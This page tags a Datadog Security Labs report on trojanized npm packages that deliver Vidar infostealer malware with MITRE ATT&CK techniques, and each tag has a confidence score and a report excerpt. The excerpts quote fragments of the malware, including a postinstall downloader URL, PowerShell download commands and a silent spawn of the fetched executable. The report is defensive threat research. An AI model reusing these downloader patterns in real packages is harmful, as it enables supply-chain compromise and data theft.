TTPwire Vol. 1 · MITRE ATT&CK · Tagged


Datadog Security Labs

MUT-4831: Trojanized npm packages deliver Vidar infostealer malware

2025-11-06

ATT&CK techniques detected

20 predictions
T1195.001 Compromise Software Dependencies and Development Tools
97%
“response and recovery cycles. In order to enable further research, we have published all MUT-4831 campaign packages to our public malicious package dataset. Conclusion: Open source package registries such as npm are fertile territory for threat actors like MUT-4831: the infor…”
T1195.001 Compromise Software Dependencies and Development Tools
96%
“MUT-4831: Trojanized npm packages deliver Vidar infostealer malware. Key points and observations: - Datadog Security Research has detected 17 npm packages (23 releases) containing downloader malware that executes via a postinstall script and targeting Windows systems - The pac…”
T1195.001 Compromise Software Dependencies and Development Tools
96%
“accounts, respectively, contain C2 domains associated with Vidar, which are regularly updated as infrastructure is rotated. The executable thus first calls home to the Telegram and Steam profiles to discover which second-order C2 infrastructure is currently active. The original…”
T1105 Ingress Tool Transfer
94%
“) { try { log('[main] ===== starting main process ====='); const downloadurl = 'https://upload.bullethost[.]cloud/download/68f55d7834645ddd64ba3e3e'; // update this with your valid download url const zippath = path.join(process.env.temp, 'blt…”
T1195.001 Compromise Software Dependencies and Development Tools
94%
“days old at the time of the first detection, indicating that the accounts were recently created by MUT-4831, probably for use in this campaign. With one exception, all packages published by these two accounts contained the campaign indicators. At the time of writing, both aartj…”
T1195.001 Compromise Software Dependencies and Development Tools
91%
“this case, we see that the Node.js script in src/dependencies.js is being executed as a postinstall script. On examining the contents of this script (see next section), we confirmed the package is indeed malicious. In two bursts, over the periods of October 21-22 and 26, …”
T1195.001 Compromise Software Dependencies and Development Tools
90%
“'https://api.telegram.org'; npm-silent-process-execution: found 2 source code matches * this package is silently executing another executable at package/lib/dependencies.js:170 var child = spawn(exepath, [], { detached: true, stdio: 'ignore' }); * …”
T1195.001 Compromise Software Dependencies and Development Tools
87%
“like npm and PyPI for signs of threat actor activity. We do so using GuardDog, a CLI static analyzer for identifying suspicious and potentially malicious signatures in package code and metadata. Initial discovery: On October 21, 2025, GuardDog flagged the npm package custom-tg-…”
T1059.001 PowerShell
86%
“…tall PowerShell script, embedded directly in the package.json file, to perform the zip archive download step. We observed two distinct PowerShell scripts used in this capacity, identical up to log messages. The more elaborate of the two is shown below, formatted for clarity. P…”
T1204.002 Malicious File
85%
“follow, especially thanks to the inclusion of comments and even log messages (indicative of a possible vibecoded origin for this script): - Download an encrypted zip archive from the bullethost[.]cloud domain to a local file - Decrypt and extract the archive, using the same…”
T1560.001 Archive via Utility
76%
“zip -- Path = bltjqzun.zip Type = zip Physical Size = 1416746 Date Time Attr Size Compressed Name ------------------- ----- ------------ ------------ ------------------------ ..... 2924408 1416590 bridle.exe --…”
T1587 Develop Capabilities
68%
“MUT-4831: Trojanized npm packages deliver Vidar infostealer malware. Key points and observations: - Datadog Security Research has detected 17 npm packages (23 releases) containing downloader malware that executes via a postinstall script and targeting Windows systems - The pac…”
T1587 Develop Capabilities
65%
“accounts, respectively, contain C2 domains associated with Vidar, which are regularly updated as infrastructure is rotated. The executable thus first calls home to the Telegram and Steam profiles to discover which second-order C2 infrastructure is currently active. The original…”
T1204.002 Malicious File
62%
“txt'; } else { Write-Host '[postinstall] error: extract.js not found at' $extractscript; } } catch { Write-Host '[postinstall] error:' $_.Exception.Message; } } \" After downloading the target zip archive, this PowerShell script hands over control to a Nod…”
T1587 Develop Capabilities
62%
“'https://api.telegram.org'; npm-silent-process-execution: found 2 source code matches * this package is silently executing another executable at package/lib/dependencies.js:170 var child = spawn(exepath, [], { detached: true, stdio: 'ignore' }); * …”
T1587 Develop Capabilities
56%
“response and recovery cycles. In order to enable further research, we have published all MUT-4831 campaign packages to our public malicious package dataset. Conclusion: Open source package registries such as npm are fertile territory for threat actors like MUT-4831: the infor…”
T1587 Develop Capabilities
55%
“like npm and PyPI for signs of threat actor activity. We do so using GuardDog, a CLI static analyzer for identifying suspicious and potentially malicious signatures in package code and metadata. Initial discovery: On October 21, 2025, GuardDog flagged the npm package custom-tg-…”
T1204.005 Malicious Library
35%
“like npm and PyPI for signs of threat actor activity. We do so using GuardDog, a CLI static analyzer for identifying suspicious and potentially malicious signatures in package code and metadata. Initial discovery: On October 21, 2025, GuardDog flagged the npm package custom-tg-…”
T1059.001 PowerShell
34%
“txt'; } else { Write-Host '[postinstall] error: extract.js not found at' $extractscript; } } catch { Write-Host '[postinstall] error:' $_.Exception.Message; } } \" After downloading the target zip archive, this PowerShell script hands over control to a Nod…”
T1059.007 JavaScript
34%
“…host[.]cloud/download/68f5503834645ddd64ba3e17' -OutFile $env:temp\\bltjqzun.zip -ErrorAction Stop; Write-Host '[postinstall] download complete, file size:' (Get-Item $env:temp\\bltjqzun.zip).Length 'bytes'; $extractscript = Join-Path …”

Summary

Analysis of a threat actor campaign targeting Windows users with Vidar infostealer malware via malicious npm packages